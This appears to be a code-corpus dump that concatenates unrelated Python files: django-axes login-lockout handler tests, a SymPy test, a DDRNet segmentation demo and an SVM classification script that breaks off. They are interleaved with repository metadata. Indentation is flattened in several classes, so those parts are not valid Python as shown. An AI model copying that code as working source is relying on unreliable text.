] | null | null | null | tests/test_handlers.py | p1-gdd/django-axes | 813a8518bc7306988492fdafdf38c0cd887f1129 | [
"MIT"
] | 3 | 2022-03-15T12:29:15.000Z | 2022-03-25T12:29:41.000Z | tests/test_handlers.py | p1-gdd/django-axes | 813a8518bc7306988492fdafdf38c0cd887f1129 | [
"MIT"
] | null | null | null | from platform import python_implementation
from unittest.mock import MagicMock, patch
from pytest import mark
from django.core.cache import cache
from django.test import override_settings
from django.urls import reverse
from django.utils import timezone
from django.utils.timezone import timedelta
from axes.conf import settings
from axes.handlers.proxy import AxesProxyHandler
from axes.helpers import get_client_str
from axes.models import AccessAttempt, AccessLog, AccessFailureLog
from tests.base import AxesTestCase
@override_settings(AXES_HANDLER="axes.handlers.base.AxesHandler")
class AxesHandlerTestCase(AxesTestCase):
@override_settings(AXES_IP_BLACKLIST=["127.0.0.1"])
def test_is_allowed_with_blacklisted_ip_address(self):
self.assertFalse(AxesProxyHandler.is_allowed(self.request))
@override_settings(
AXES_NEVER_LOCKOUT_WHITELIST=True, AXES_IP_WHITELIST=["127.0.0.1"]
)
def test_is_allowed_with_whitelisted_ip_address(self):
self.assertTrue(AxesProxyHandler.is_allowed(self.request))
@override_settings(AXES_NEVER_LOCKOUT_GET=True)
def test_is_allowed_with_whitelisted_method(self):
self.request.method = "GET"
self.assertTrue(AxesProxyHandler.is_allowed(self.request))
@override_settings(AXES_LOCK_OUT_AT_FAILURE=False)
def test_is_allowed_no_lock_out(self):
self.assertTrue(AxesProxyHandler.is_allowed(self.request))
@override_settings(AXES_ONLY_ADMIN_SITE=True)
def test_only_admin_site(self):
request = MagicMock()
request.path = "/test/"
self.assertTrue(AxesProxyHandler.is_allowed(self.request))
def test_is_admin_site(self):
request = MagicMock()
tests = ( # (AXES_ONLY_ADMIN_SITE, URL, Expected)
(True, "/test/", True),
(True, reverse("admin:index"), False),
(False, "/test/", False),
(False, reverse("admin:index"), False),
)
for setting_value, url, expected in tests:
with override_settings(AXES_ONLY_ADMIN_SITE=setting_value):
request.path = url
self.assertEqual(AxesProxyHandler().is_admin_site(request), expected)
@override_settings(ROOT_URLCONF="tests.urls_empty")
@override_settings(AXES_ONLY_ADMIN_SITE=True)
def test_is_admin_site_no_admin_site(self):
request = MagicMock()
request.path = "/admin/"
self.assertTrue(AxesProxyHandler().is_admin_site(self.request))
class AxesProxyHandlerTestCase(AxesTestCase):
    """Verify that AxesProxyHandler forwards every signal to its implementation."""

    def setUp(self):
        self.sender = MagicMock()
        self.credentials = MagicMock()
        self.request = MagicMock()
        self.user = MagicMock()
        self.instance = MagicMock()

    @patch("axes.handlers.proxy.AxesProxyHandler.implementation", None)
    def test_setting_changed_signal_triggers_handler_reimport(self):
        self.assertIsNone(AxesProxyHandler.implementation)
        with self.settings(AXES_HANDLER="axes.handlers.database.AxesDatabaseHandler"):
            self.assertIsNotNone(AxesProxyHandler.implementation)

    @patch("axes.handlers.proxy.AxesProxyHandler.implementation")
    def test_user_login_failed(self, handler):
        handler.user_login_failed.assert_not_called()
        AxesProxyHandler.user_login_failed(self.sender, self.credentials, self.request)
        handler.user_login_failed.assert_called()

    @patch("axes.handlers.proxy.AxesProxyHandler.implementation")
    def test_user_logged_in(self, handler):
        handler.user_logged_in.assert_not_called()
        AxesProxyHandler.user_logged_in(self.sender, self.request, self.user)
        handler.user_logged_in.assert_called()

    @patch("axes.handlers.proxy.AxesProxyHandler.implementation")
    def test_user_logged_out(self, handler):
        handler.user_logged_out.assert_not_called()
        AxesProxyHandler.user_logged_out(self.sender, self.request, self.user)
        handler.user_logged_out.assert_called()

    @patch("axes.handlers.proxy.AxesProxyHandler.implementation")
    def test_post_save_access_attempt(self, handler):
        handler.post_save_access_attempt.assert_not_called()
        AxesProxyHandler.post_save_access_attempt(self.instance)
        handler.post_save_access_attempt.assert_called()

    @patch("axes.handlers.proxy.AxesProxyHandler.implementation")
    def test_post_delete_access_attempt(self, handler):
        handler.post_delete_access_attempt.assert_not_called()
        AxesProxyHandler.post_delete_access_attempt(self.instance)
        handler.post_delete_access_attempt.assert_called()
class AxesHandlerBaseTestCase(AxesTestCase):
    """Shared assertion helpers used by the concrete handler test cases below."""

    def check_whitelist(self, log):
        """A failed login from a whitelisted client should only be logged."""
        with override_settings(
            AXES_NEVER_LOCKOUT_WHITELIST=True, AXES_IP_WHITELIST=[self.ip_address]
        ):
            AxesProxyHandler.user_login_failed(
                sender=None, request=self.request, credentials=self.credentials
            )
            expected_client = get_client_str(
                self.username,
                self.ip_address,
                self.user_agent,
                self.path_info,
                self.request,
            )
            log.info.assert_called_with(
                "AXES: Login failed from whitelisted client %s.", expected_client
            )

    def check_empty_request(self, log, handler):
        """A missing request object should produce an error log entry."""
        AxesProxyHandler.user_login_failed(sender=None, credentials={}, request=None)
        log.error.assert_called_with(
            f"AXES: {handler}.user_login_failed does not function without a request."
        )
@override_settings(AXES_HANDLER="axes.handlers.database.AxesDatabaseHandler")
class ResetAttemptsTestCase(AxesHandlerBaseTestCase):
"""Resetting attempts is currently implemented only for database handler"""
USERNAME_1 = "foo_username"
USERNAME_2 = "bar_username"
IP_1 = "127.1.0.1"
IP_2 = "127.1.0.2"
def setUp(self):
super().setUp()
self.create_attempt()
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_1)
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_2)
self.create_attempt(username=self.USERNAME_2, ip_address=self.IP_1)
self.create_attempt(username=self.USERNAME_2, ip_address=self.IP_2)
def test_handler_reset_attempts(self):
self.assertEqual(5, AxesProxyHandler.reset_attempts())
self.assertFalse(AccessAttempt.objects.count())
def test_handler_reset_attempts_username(self):
self.assertEqual(2, AxesProxyHandler.reset_attempts(username=self.USERNAME_1))
self.assertEqual(AccessAttempt.objects.count(), 3)
self.assertEqual(
AccessAttempt.objects.filter(ip_address=self.USERNAME_1).count(), 0
)
def test_handler_reset_attempts_ip(self):
self.assertEqual(2, AxesProxyHandler.reset_attempts(ip_address=self.IP_1))
self.assertEqual(AccessAttempt.objects.count(), 3)
self.assertEqual(AccessAttempt.objects.filter(ip_address=self.IP_1).count(), 0)
def test_handler_reset_attempts_ip_and_username(self):
self.assertEqual(
1,
AxesProxyHandler.reset_attempts(
ip_address=self.IP_1, username=self.USERNAME_1
),
)
self.assertEqual(AccessAttempt.objects.count(), 4)
self.assertEqual(AccessAttempt.objects.filter(ip_address=self.IP_1).count(), 1)
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_1)
self.assertEqual(
1,
AxesProxyHandler.reset_attempts(
ip_address=self.IP_1, username=self.USERNAME_2
),
)
self.assertEqual(
1,
AxesProxyHandler.reset_attempts(
ip_address=self.IP_2, username=self.USERNAME_1
),
)
def test_handler_reset_attempts_ip_or_username(self):
self.assertEqual(
3,
AxesProxyHandler.reset_attempts(
ip_address=self.IP_1, username=self.USERNAME_1, ip_or_username=True
),
)
self.assertEqual(AccessAttempt.objects.count(), 2)
self.assertEqual(AccessAttempt.objects.filter(ip_address=self.IP_1).count(), 0)
self.assertEqual(
AccessAttempt.objects.filter(ip_address=self.USERNAME_1).count(), 0
)
@override_settings(
    AXES_HANDLER="axes.handlers.database.AxesDatabaseHandler",
    AXES_COOLOFF_TIME=timedelta(seconds=2),
    AXES_RESET_ON_SUCCESS=True,
    AXES_ENABLE_ACCESS_FAILURE_LOG=True,
)
@mark.xfail(
    python_implementation() == "PyPy",
    reason="PyPy implementation is flaky for this test",
    strict=False,
)
class AxesDatabaseHandlerTestCase(AxesHandlerBaseTestCase):
    """Exercise the database-backed handler: reset helpers, logging, limits."""

    def test_handler_reset_attempts(self):
        self.create_attempt()
        self.assertEqual(1, AxesProxyHandler.reset_attempts())
        self.assertFalse(AccessAttempt.objects.count())

    def test_handler_reset_logs(self):
        self.create_log()
        self.assertEqual(1, AxesProxyHandler.reset_logs())
        self.assertFalse(AccessLog.objects.count())

    def test_handler_reset_logs_older_than_42_days(self):
        self.create_log()

        then = timezone.now() - timezone.timedelta(days=90)
        with patch("django.utils.timezone.now", return_value=then):
            self.create_log()

        self.assertEqual(AccessLog.objects.count(), 2)
        self.assertEqual(1, AxesProxyHandler.reset_logs(age_days=42))
        self.assertEqual(AccessLog.objects.count(), 1)

    def test_handler_reset_failure_logs(self):
        self.create_failure_log()
        self.assertEqual(1, AxesProxyHandler.reset_failure_logs())
        self.assertFalse(AccessFailureLog.objects.count())

    def test_handler_reset_failure_logs_older_than_42_days(self):
        self.create_failure_log()

        then = timezone.now() - timezone.timedelta(days=90)
        with patch("django.utils.timezone.now", return_value=then):
            self.create_failure_log()

        self.assertEqual(AccessFailureLog.objects.count(), 2)
        self.assertEqual(1, AxesProxyHandler.reset_failure_logs(age_days=42))
        self.assertEqual(AccessFailureLog.objects.count(), 1)

    def test_handler_remove_out_of_limit_failure_logs(self):
        _more = 10
        for i in range(settings.AXES_ACCESS_FAILURE_LOG_PER_USER_LIMIT + _more):
            self.create_failure_log()
        self.assertEqual(
            _more,
            AxesProxyHandler.remove_out_of_limit_failure_logs(username=self.username),
        )

    @override_settings(AXES_RESET_ON_SUCCESS=True)
    def test_handler(self):
        self.check_handler()

    @override_settings(AXES_RESET_ON_SUCCESS=False)
    def test_handler_without_reset(self):
        self.check_handler()

    @override_settings(AXES_FAILURE_LIMIT=lambda *args: 3)
    def test_handler_callable_failure_limit(self):
        self.check_handler()

    @override_settings(AXES_FAILURE_LIMIT="tests.base.custom_failure_limit")
    def test_handler_str_failure_limit(self):
        self.check_handler()

    @override_settings(AXES_FAILURE_LIMIT=None)
    def test_handler_invalid_failure_limit(self):
        with self.assertRaises(TypeError):
            self.check_handler()

    @override_settings(AXES_LOCK_OUT_AT_FAILURE=False)
    def test_handler_without_lockout(self):
        self.check_handler()

    @patch("axes.handlers.database.log")
    def test_empty_request(self, log):
        self.check_empty_request(log, "AxesDatabaseHandler")

    @patch("axes.handlers.database.log")
    def test_whitelist(self, log):
        self.check_whitelist(log)

    @override_settings(AXES_ONLY_USER_FAILURES=True)
    @patch("axes.handlers.database.log")
    def test_user_login_failed_only_user_failures_with_none_username(self, log):
        credentials = {"username": None, "password": "test"}
        sender = MagicMock()
        AxesProxyHandler.user_login_failed(sender, credentials, self.request)
        # FIX: dropped an unused `attempt = AccessAttempt.objects.all()` local.
        self.assertEqual(0, AccessAttempt.objects.count())
        log.warning.assert_called_with(
            "AXES: Username is None and AXES_ONLY_USER_FAILURES is enabled, new record will NOT be created."
        )

    def test_user_login_failed_with_none_username(self):
        credentials = {"username": None, "password": "test"}
        sender = MagicMock()
        AxesProxyHandler.user_login_failed(sender, credentials, self.request)
        # FIX: dropped an unused `attempt = AccessAttempt.objects.all()` local.
        self.assertEqual(1, AccessAttempt.objects.filter(username__isnull=True).count())

    def test_user_login_failed_multiple_username(self):
        # (total attempt rows, failures on 2nd attempt, settings, usernames)
        configurations = (
            (2, 1, {}, ["admin", "admin1"]),
            (2, 1, {"AXES_USE_USER_AGENT": True}, ["admin", "admin1"]),
            (2, 1, {"AXES_ONLY_USER_FAILURES": True}, ["admin", "admin1"]),
            (
                2,
                1,
                {"AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP": True},
                ["admin", "admin1"],
            ),
            (
                1,
                2,
                {"AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP": True},
                ["admin", "admin"],
            ),
            (1, 2, {"AXES_LOCK_OUT_BY_USER_OR_IP": True}, ["admin", "admin"]),
            (2, 1, {"AXES_LOCK_OUT_BY_USER_OR_IP": True}, ["admin", "admin1"]),
        )

        for (
            total_attempts_count,
            failures_since_start,
            overrides,
            usernames,
        ) in configurations:
            with self.settings(**overrides):
                with self.subTest(
                    total_attempts_count=total_attempts_count,
                    failures_since_start=failures_since_start,
                    settings=overrides,
                ):
                    self.login(username=usernames[0])
                    attempt = AccessAttempt.objects.get(username=usernames[0])
                    self.assertEqual(1, attempt.failures_since_start)

                    # check the number of failures associated to the attempt
                    self.login(username=usernames[1])
                    attempt = AccessAttempt.objects.get(username=usernames[1])
                    self.assertEqual(failures_since_start, attempt.failures_since_start)

                    # check the number of distinct attempts
                    self.assertEqual(
                        total_attempts_count, AccessAttempt.objects.count()
                    )

            # Reset state between configurations.
            AccessAttempt.objects.all().delete()
@override_settings(AXES_HANDLER="axes.handlers.cache.AxesCacheHandler")
class ResetAttemptsCacheHandlerTestCase(AxesHandlerBaseTestCase):
"""Test reset attempts for the cache handler"""
USERNAME_1 = "foo_username"
USERNAME_2 = "bar_username"
IP_1 = "127.1.0.1"
IP_2 = "127.1.0.2"
def set_up_login_attempts(self):
"""Set up the login attempts."""
self.login(username=self.USERNAME_1, remote_addr=self.IP_1)
self.login(username=self.USERNAME_1, remote_addr=self.IP_2)
self.login(username=self.USERNAME_2, remote_addr=self.IP_1)
self.login(username=self.USERNAME_2, remote_addr=self.IP_2)
def check_failures(self, failures, username=None, ip_address=None):
if ip_address is None and username is None:
raise NotImplementedError("Must supply ip_address or username")
try:
prev_ip = self.request.META["REMOTE_ADDR"]
credentials = {"username": username} if username else {}
if ip_address is not None:
self.request.META["REMOTE_ADDR"] = ip_address
self.assertEqual(
failures,
AxesProxyHandler.get_failures(self.request, credentials=credentials),
)
finally:
self.request.META["REMOTE_ADDR"] = prev_ip
def test_handler_reset_attempts(self):
with self.assertRaises(NotImplementedError):
AxesProxyHandler.reset_attempts()
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_handler_reset_attempts_username(self):
self.set_up_login_attempts()
self.assertEqual(
2,
AxesProxyHandler.get_failures(
self.request, credentials={"username": self.USERNAME_1}
),
)
self.assertEqual(
2,
AxesProxyHandler.get_failures(
self.request, credentials={"username": self.USERNAME_2}
),
)
self.assertEqual(1, AxesProxyHandler.reset_attempts(username=self.USERNAME_1))
self.assertEqual(
0,
AxesProxyHandler.get_failures(
self.request, credentials={"username": self.USERNAME_1}
),
)
self.assertEqual(
2,
AxesProxyHandler.get_failures(
self.request, credentials={"username": self.USERNAME_2}
),
)
def test_handler_reset_attempts_ip(self):
self.set_up_login_attempts()
self.check_failures(2, ip_address=self.IP_1)
self.assertEqual(1, AxesProxyHandler.reset_attempts(ip_address=self.IP_1))
self.check_failures(0, ip_address=self.IP_1)
self.check_failures(2, ip_address=self.IP_2)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_handler_reset_attempts_ip_and_username(self):
self.set_up_login_attempts()
self.check_failures(1, username=self.USERNAME_1, ip_address=self.IP_1)
self.check_failures(1, username=self.USERNAME_2, ip_address=self.IP_1)
self.check_failures(1, username=self.USERNAME_1, ip_address=self.IP_2)
self.assertEqual(
1,
AxesProxyHandler.reset_attempts(
ip_address=self.IP_1, username=self.USERNAME_1
),
)
self.check_failures(0, username=self.USERNAME_1, ip_address=self.IP_1)
self.check_failures(1, username=self.USERNAME_2, ip_address=self.IP_1)
self.check_failures(1, username=self.USERNAME_1, ip_address=self.IP_2)
def test_handler_reset_attempts_ip_or_username(self):
with self.assertRaises(NotImplementedError):
AxesProxyHandler.reset_attempts()
@override_settings(
    AXES_HANDLER="axes.handlers.cache.AxesCacheHandler",
    AXES_COOLOFF_TIME=timedelta(seconds=1),
)
class AxesCacheHandlerTestCase(AxesHandlerBaseTestCase):
    """Exercise the cache-backed handler through the shared check helpers."""

    @override_settings(AXES_RESET_ON_SUCCESS=True)
    def test_handler(self):
        self.check_handler()

    @override_settings(AXES_RESET_ON_SUCCESS=False)
    def test_handler_without_reset(self):
        self.check_handler()

    @override_settings(AXES_LOCK_OUT_AT_FAILURE=False)
    def test_handler_without_lockout(self):
        self.check_handler()

    @patch("axes.handlers.cache.log")
    def test_empty_request(self, log):
        self.check_empty_request(log, "AxesCacheHandler")

    @patch("axes.handlers.cache.log")
    def test_whitelist(self, log):
        self.check_whitelist(log)

    @override_settings(AXES_ONLY_USER_FAILURES=True)
    @patch.object(cache, "set")
    @patch("axes.handlers.cache.log")
    def test_user_login_failed_only_user_failures_with_none_username(
        self, log, cache_set
    ):
        credentials = {"username": None, "password": "test"}
        sender = MagicMock()
        AxesProxyHandler.user_login_failed(sender, credentials, self.request)
        cache_set.assert_not_called()
        log.warning.assert_called_with(
            "AXES: Username is None and AXES_ONLY_USER_FAILURES is enabled, new record will NOT be created."
        )

    @patch.object(cache, "set")
    def test_user_login_failed_with_none_username(self, cache_set):
        credentials = {"username": None, "password": "test"}
        sender = MagicMock()
        AxesProxyHandler.user_login_failed(sender, credentials, self.request)
        cache_set.assert_called()
@override_settings(AXES_HANDLER="axes.handlers.dummy.AxesDummyHandler")
class AxesDummyHandlerTestCase(AxesHandlerBaseTestCase):
def test_handler(self):
for _ in range(settings.AXES_FAILURE_LIMIT):
self.login()
self.check_login()
def test_handler_is_allowed(self):
self.assertEqual(True, AxesProxyHandler.is_allowed(self.request, {}))
def test_handler_get_failures(self):
self.assertEqual(0, AxesProxyHandler.get_failures(self.request, {}))
@override_settings(AXES_HANDLER="axes.handlers.test.AxesTestHandler")
class AxesTestHandlerTestCase(AxesHandlerBaseTestCase):
def test_handler_reset_attempts(self):
self.assertEqual(0, AxesProxyHandler.reset_attempts())
def test_handler_reset_logs(self):
self.assertEqual(0, AxesProxyHandler.reset_logs())
def test_handler_is_allowed(self):
self.assertEqual(True, AxesProxyHandler.is_allowed(self.request, {}))
def test_handler_get_failures(self):
self.assertEqual(0, AxesProxyHandler.get_failures(self.request, {}))
| 39.394393 | 108 | 0.683479 |
2cc992f4dc4434d16972c388781f01b472cb8ace | 603 | py | Python | sympy/core/tests/test_compatibility.py | cap11235/sympy | 6f68fa186dc9e80cdafddb1e4d72f49684286cda | [
"BSD-3-Clause"
] | 26 | 2018-02-14T23:52:58.000Z | 2021-08-16T13:50:03.000Z | sympy/core/tests/test_compatibility.py | shashank-agg/sympy | ecf69893c0b9927ea7192113b2421d639aee6ffb | [
"BSD-3-Clause"
] | null | null | null | sympy/core/tests/test_compatibility.py | shashank-agg/sympy | ecf69893c0b9927ea7192113b2421d639aee6ffb | [
"BSD-3-Clause"
] | 10 | 2018-08-13T19:38:39.000Z | 2020-04-19T03:02:00.000Z | from sympy.core.compatibility import default_sort_key, as_int, ordered
from sympy.core.singleton import S
from sympy.utilities.pytest import raises
from sympy.abc import x
def test_default_sort_key():
    # Callables sort ahead of the Symbol x under default_sort_key.
    identity = lambda arg: arg
    assert sorted([identity, x, identity], key=default_sort_key) == [identity, identity, x]
def test_as_int():
    # Floats with a fractional part and non-numeric objects are rejected.
    for bad in (1.1, []):
        raises(ValueError, lambda: as_int(bad))
def test_ordered():
    # Issue 4111 - this had been failing with python2/3 problems
    expected = [{1: 3}, {1: 3, 2: 4, 9: 10}]
    assert list(ordered([{1: 3, 2: 4, 9: 10}, {1: 3}])) == expected
| 27.409091 | 75 | 0.661692 |
daf1046912bc8b489d93bba1aca4b5e4ff2bc450 | 5,376 | py | Python | tools/demo_detect.py | bkhti4/DDRNet.pytorch | d3c56f45ce36d9f16fedaa44c68dcd4e627f04ad | [
"MIT"
] | null | null | null | tools/demo_detect.py | bkhti4/DDRNet.pytorch | d3c56f45ce36d9f16fedaa44c68dcd4e627f04ad | [
"MIT"
] | null | null | null | tools/demo_detect.py | bkhti4/DDRNet.pytorch | d3c56f45ce36d9f16fedaa44c68dcd4e627f04ad | [
"MIT"
] | null | null | null | import argparse
import os
import pprint
import shutil
import sys
import cv2
import logging
import time
import timeit
from pathlib import Path
import numpy as np
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.nn import functional as F
import _init_paths
import models
from config import config
import datasets
from datasets.base_dataset import BaseDataset
#from lib.config import config
from config import update_config
#from core.function import testval, test
from utils.modelsummary import get_model_summary
from utils.utils import create_logger, FullModel, speed_test, Map16
def parse_args():
    """Parse command-line arguments and merge them into the global config."""
    parser = argparse.ArgumentParser(description='Train segmentation network')
    parser.add_argument('--cfg',
                        type=str,
                        default="experiments/cityscapes/ddrnet23_slim.yaml",
                        help='experiment configure file name')
    parser.add_argument('opts',
                        nargs=argparse.REMAINDER,
                        default=None,
                        help="Modify config options using the command-line")
    parser.add_argument('--source',
                        default='challenge.mp4',
                        help="Video path")
    parser.add_argument('--show',
                        type=bool,
                        default=False,
                        help='If True display video')
    # Ignore unrecognised flags instead of erroring out.
    args, _unknown = parser.parse_known_args()
    update_config(config, args)
    return args
def main():
    """Run DDRNet segmentation over a video stream, rendering and timing each frame."""
    args = parse_args()

    logger, final_output_dir, _ = create_logger(config, args.cfg, 'test')

    # cudnn related setting
    cudnn.benchmark = config.CUDNN.BENCHMARK
    cudnn.deterministic = config.CUDNN.DETERMINISTIC
    cudnn.enabled = config.CUDNN.ENABLED

    # build model
    module = eval('models.' + config.MODEL.NAME)
    module.BatchNorm2d_class = module.BatchNorm2d = torch.nn.BatchNorm2d
    model = eval('models.' + config.MODEL.NAME + '.get_seg_model')(config)

    if config.TEST.MODEL_FILE:
        model_state_file = config.TEST.MODEL_FILE
    else:
        model_state_file = 'pretrained_models/hrnet_ocr_cs_8162_torch11.pth'
    logger.info('=> loading model from {}'.format(model_state_file))

    pretrained_dict = torch.load(model_state_file)
    if 'state_dict' in pretrained_dict:
        pretrained_dict = pretrained_dict['state_dict']
    model_dict = model.state_dict()
    # Checkpoint keys carry a 6-character prefix (k[6:]); strip it and keep
    # only the keys the current model actually defines.
    pretrained_dict = {k[6:]: v for k, v in pretrained_dict.items()
                       if k[6:] in model_dict.keys()}
    model_dict.update(pretrained_dict)
    model.load_state_dict(model_dict)

    device = torch.device('cuda:0')
    model.to(device).cuda()

    # prepare data
    test_size = (config.TEST.IMAGE_SIZE[1], config.TEST.IMAGE_SIZE[0])
    cap = cv2.VideoCapture(args.source)

    times_infer, times_pipe = [], []
    model.eval()
    bdataset = BaseDataset(num_classes=config.DATASET.NUM_CLASSES,
                           ignore_label=config.TRAIN.IGNORE_LABEL,
                           base_size=config.TEST.BASE_SIZE,
                           crop_size=test_size,
                           downsample_rate=1)
    map16 = Map16()

    while True:
        ret, image = cap.read()
        if not ret:
            # FIX: cap.read() returns (False, None) at end of stream or on a
            # failed grab; previously this crashed inside cv2.resize(None).
            break

        image = cv2.resize(image, test_size)
        h, w, _ = image.shape
        size = (h, w)
        image = bdataset.input_transform(image)
        image = image.transpose((2, 0, 1))

        t0 = time.time()
        with torch.no_grad():
            pred = bdataset.multi_scale_inference(config, model, image)
            if pred.size()[-2] != size[0] or pred.size()[-1] != size[1]:
                pred = F.interpolate(
                    pred, size[-2:],
                    mode='bilinear', align_corners=config.MODEL.ALIGN_CORNERS
                )

        # Undo the ImageNet normalization so the frame can be rendered.
        image = image.transpose((1, 2, 0))
        image *= [0.229, 0.224, 0.225]
        image += [0.485, 0.456, 0.406]
        image *= 255.0
        image = image.astype(np.uint8)

        _, pred = torch.max(pred, dim=1)
        pred = pred.squeeze(0).cpu().numpy()
        print("Output shape: ", pred.shape)
        img8_out = map16.visualize_result(image, pred)

        # Scaling to preserve Aspect ratio
        img8_out = cv2.resize(img8_out, (1024, 512), interpolation=cv2.INTER_AREA)
        t1 = time.time()
        t2 = time.time()

        times_infer.append(t1 - t0)
        times_pipe.append(t2 - t0)
        # Keep a rolling window of the last 20 timings for the FPS display.
        times_infer = times_infer[-20:]
        times_pipe = times_pipe[-20:]

        ms = sum(times_infer) / len(times_infer) * 1000
        # Small epsilon guards against division by zero on the first frames.
        fps_infer = 1000 / (ms + 0.00001)
        fps_pipe = 1000 / (sum(times_pipe) / len(times_pipe) * 1000)

        img8_out = cv2.putText(img8_out, "Time: {:.1f}FPS".format(fps_infer),
                               (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1,
                               (0, 0, 255), 2)

        if args.show:
            cv2.imshow("DDRNET", img8_out)
            if cv2.waitKey(1) & 0xFF == ord("q"):
                cv2.destroyAllWindows()
                break

        print("Inference Time: {:.2f}ms, Detection FPS: {:.1f}, total FPS: {:.1f}".format(ms, fps_infer, fps_pipe))

    cap.release()
if __name__ == '__main__':
    # Script entry point: main() is defined earlier in this file
    # (runs the HRNet-OCR segmentation demo over a video source).
    main()
| 31.075145 | 135 | 0.614955 |
3fac3a14203b6410dff0fb8df0083bd633c083c6 | 7,487 | py | Python | src/classification/svm.py | ShNadi/study_motivation | cff7c3995e69ce2d91d0a2753b57d8089df3cad2 | [
"MIT"
] | null | null | null | src/classification/svm.py | ShNadi/study_motivation | cff7c3995e69ce2d91d0a2753b57d8089df3cad2 | [
"MIT"
] | null | null | null | src/classification/svm.py | ShNadi/study_motivation | cff7c3995e69ce2d91d0a2753b57d8089df3cad2 | [
"MIT"
] | null | null | null | # Last update 25-07-2021
# Remove reenrolled from the list of features
# change the target variable from bsa_dummy to reenrolled
# add df['program'] to the list of features
import pandas as pd
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import PolynomialFeatures
from sklearn.svm import SVC
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from imblearn.over_sampling import SMOTE
from sklearn.model_selection import train_test_split
from imblearn.pipeline import Pipeline
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import matplotlib.pyplot as plt
def svm_numeric(df):
    """Train and evaluate a linear SVM predicting ``bsa_dummy``.

    In the target column (bsa_dummy), 0 stands for "BSA obtained" and
    1 for "BSA not obtained".

    Side effects:
      * appends train/test scores, confusion matrix and classification
        report to ``report.txt``;
      * writes the sorted linear-SVM coefficients to
        ``feature_importance.txt`` and shows them as a horizontal bar plot.

    :param df: raw motivation dataset; mutated in place (text/identifier
        columns dropped, comma-decimal strings converted to floats).
    """
    # Single definition of the output location (was duplicated six times).
    report_dir = '../../results/output/classification_reports/svm/remove_reenrolled_bsa_is_target'
    report_path = report_dir + '/report.txt'

    # Drop free-text and identifier columns that must not enter the model.
    for dropped in ('language', 'motivation', 'studentnr_crypt'):
        del df[dropped]
    df = df.fillna(method='ffill')

    # Select categorical features
    categorical_features = ['cohort', 'field', 'prior_educ', 'previously_enrolled', 'multiple_requests', 'gender',
                            'interest', 'ase', 'year', 'program']

    # Select numeric features
    numeric_features = ['age', 'HSGPA', 'WC', 'WPS', 'Sixltr',
                        'Dic', 'funct', 'pronoun', 'ppron', 'i',
                        'we', 'you', 'shehe', 'they', 'ipron',
                        'article', 'verb', 'auxverb', 'past', 'present',
                        'future', 'adverb', 'preps', 'conj', 'negate',
                        'quant', 'number', 'swear', 'social', 'family',
                        'friend', 'humans', 'affect', 'posemo', 'negemo',
                        'anx', 'anger', 'sad', 'cogmech', 'insight',
                        'cause', 'discrep', 'tentat', 'certain', 'inhib',
                        'incl', 'excl', 'percept', 'see', 'hear',
                        'feel', 'bio', 'body', 'health', 'sexual',
                        'ingest', 'relativ', 'motion', 'space', 'time',
                        'work', 'achieve', 'leisure', 'home', 'money',
                        'relig', 'death', 'assent', 'nonfl', 'filler',
                        'pronadv', 'shehethey', 'AllPunc', 'Period', 'Comma',
                        'Colon', 'SemiC', 'QMark', 'Exclam', 'Dash',
                        'Quote', 'Apostro', 'Parenth', 'OtherP', 'count_punct',
                        'count_stopwords', 'nr_token', 'nr_adj', 'nr_noun', 'nr_verb',
                        'nr_number', 'topic1', 'topic2', 'topic3', 'topic4',
                        'topic5', 'topic6', 'topic7', 'topic8', 'topic9',
                        'topic10', 'topic11', 'topic12', 'topic13', 'topic14',
                        'topic15']

    # Columns exported with a comma as decimal separator; convert to float.
    change_type = ['WPS', 'Sixltr',
                   'Dic', 'funct', 'pronoun', 'ppron', 'i',
                   'we', 'you', 'shehe', 'they', 'ipron',
                   'article', 'verb', 'auxverb', 'past', 'present',
                   'future', 'adverb', 'preps', 'conj', 'negate',
                   'quant', 'number', 'swear', 'social', 'family',
                   'friend', 'humans', 'affect', 'posemo', 'negemo',
                   'anx', 'anger', 'sad', 'cogmech', 'insight',
                   'cause', 'discrep', 'tentat', 'certain', 'inhib',
                   'incl', 'excl', 'percept', 'see', 'hear',
                   'feel', 'bio', 'body', 'health', 'sexual',
                   'ingest', 'relativ', 'motion', 'space', 'time',
                   'work', 'achieve', 'leisure', 'home', 'money',
                   'relig', 'death', 'assent', 'nonfl', 'filler',
                   'pronadv', 'shehethey', 'AllPunc', 'Period', 'Comma',
                   'Colon', 'SemiC', 'QMark', 'Exclam', 'Dash',
                   'Quote', 'Apostro', 'Parenth', 'OtherP']
    df[change_type] = df[change_type].apply(lambda x: x.str.replace(',', '.'))
    df[change_type] = df[change_type].astype(float).fillna(0.0)

    # Standard-scale numeric columns; one-hot encode categorical columns.
    numeric_transformer = Pipeline(steps=[('scaler', StandardScaler())])
    categorical_transformer = Pipeline(steps=[
        ('onehot', OneHotEncoder(handle_unknown='ignore'))])
    preprocessor = ColumnTransformer(
        transformers=[
            ('num', numeric_transformer, numeric_features),
            ('cat', categorical_transformer, categorical_features)])

    # Chain preprocessing -> SMOTE oversampling -> linear SVM in one pipeline.
    smt = SMOTE(random_state=42)
    lor = SVC(kernel='linear')
    clf = Pipeline([('preprocessor', preprocessor), ('smt', smt),
                    ('lor', lor)])

    # Split the data and fit the chained pipeline on the training fold.
    y = df['bsa_dummy']
    X = df.drop('bsa_dummy', axis=1)
    X_train, X_test, y_train, y_test = train_test_split(
        X, y, random_state=50, shuffle=True, stratify=y)
    clf.fit(X_train, y_train)

    # Train score (computed once; the original scored twice per metric).
    train_score = clf.score(X_train, y_train)
    print('train score: ', train_score)
    with open(report_path, 'a+') as f:
        print('train score: ', train_score, file=f)

    # Test score
    test_score = clf.score(X_test, y_test)
    print('test score: ', test_score)
    with open(report_path, 'a+') as f:
        print('\n', file=f)
        print('test score: ', test_score, file=f)

    # Confusion matrix on the held-out fold.
    clf_predicted = clf.predict(X_test)
    confusion = confusion_matrix(y_test, clf_predicted)
    print(confusion)
    with open(report_path, 'a+') as f:
